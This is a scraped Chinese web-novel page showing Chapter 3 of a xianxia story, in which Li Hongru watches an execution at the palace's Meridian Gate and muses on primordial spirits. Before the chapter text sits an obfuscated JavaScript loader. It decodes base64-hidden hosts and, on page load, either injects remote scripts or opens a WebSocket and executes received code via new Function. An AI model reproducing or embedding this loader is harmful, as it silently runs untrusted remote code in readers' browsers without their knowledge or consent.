笔趣阁

字:
关灯 护眼
笔趣阁 > 我若修仙法力齐天 > 第三章 帝剑贞观
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第三章 帝剑贞观

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
午门是皇宫的正门,属于京城重地,对能进出午门的人员有着严格的限制。
  即便是荣才俊,也只得寻了数百米外观星楼开放的一处厢房中远远眺望。
  李鸿儒放眼望去,只见那午门口诸多官员静静站立。
  文官位于左侧,武将则站立在右侧。
  诸多人手放于兵刃之上,脸色肃穆,隐隐之间弥漫着一股肃杀气息。
  在那午门的前方,有一位穿着红袍的官员站立。
  这便是荣才俊提及的魏大人了。
  也是此次主持午门斩首的总负责人。
  对方手持三束长香,嘴中念念有词。
  待得祷文念完,他手中的长香亦是正好燃烧殆尽。
  李鸿儒看了看手上的简易卡表,此时正是午时三刻,也就是十二点整。
  “时间到了。”
  一旁手持神仙粉的荣才俊神情显得有些兴奋,脸上浮现出一丝病态的红润。
  这年代娱乐活动有限,看人砍头也是吃瓜群众们不可多得的欢乐时光。
  高层博弈,底层吃瓜。
  没什么兔死狐悲的心态,大抵是看到以往高不可及的大人物落难,心中不免有些小爽。
  李鸿儒数次见识这类活动,对荣才俊的心态倒也能理解。
  此时是午时三刻,太阳挂在天空的正中央,属于一天中‘阳气’最盛之时。
  据说此时被斩者,便是做鬼都没有资格。
  “请剑!”
  远处的魏大人高声大喝了一句,随即便见两个穿着金铠的羽林军禁卫抬着一个红漆长盒重步向前。
  一丝轻微的声音响起,随即又渐渐低声了下去。
  “家父曾言魏大人元神晋入八品,拥有鬼神不可测之力量,能让他祈香净身,此番也不知使唤的何等神兵!”
  作为看客,荣才俊显然是个资深合格的看客。
  他通晓其中一些内容,也见识过一定的物品,而不至于风风火火而来,看个人头落地便心满意足归去。
  看客万千,若要看明白其中的关键,转而从中获得一丝益处,这才会是一个真正的看客。
  “元神还有等阶?”李鸿儒问道。
  “那必须的”荣才俊苦着脸道:“就是那玩意儿离咱们有点远,咱们这辈子读书能弄个浩然正气临身,鬼神不侵的本领已经算是了不得。”
  身为子爵的后代,最终进入到四门馆中,和平民混迹在一起,荣才俊觉得这已经能说明清楚自己的资质。
  “正气临身,鬼神不侵,元神……”
  李鸿儒咀嚼了一番。
  读了数年书,他也没感觉出什么正气临身。
  除了会一堆之乎者也,擅长引用些许圣贤之言当杠精,他压根没觉察到自己能修炼什么额外的能力。
  但据一些世家子提及,读书成为大儒,便有能力显化元神。
  读书是一条通天之路。
  从名字便能看出,李保国对他寄予了厚望。
  但李鸿儒觉得自己可能要辜负这种期盼了。
  上辈子他算是个读书的料,但这辈子真的不行。
  《九经》晦涩难懂,教书的直讲【教职人员的一种称呼,较之助教低一级】只会照本宣科,要求背诵全书。
  而如助教骆永思等人,也只是半桶水的能耐,远称不上大儒,至今没显化过元神。
  而骆永思等人已经修炼而成的浩然正气,李鸿儒也没看出什么来。
  据说浩然正气只有在遭遇鬼神的情况下才会显化,与常人相处时并无多少用处。
  这种教育的条件和方式下,难有可能出什么大才。
  读书数年之后,他们最终只能算识字,读过经典,难有其他造化。
  李鸿儒对元神的概念极为模糊,甚至一度用科学的态度表示怀疑。
  此番随着荣才俊而来,便是认证的时刻。
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师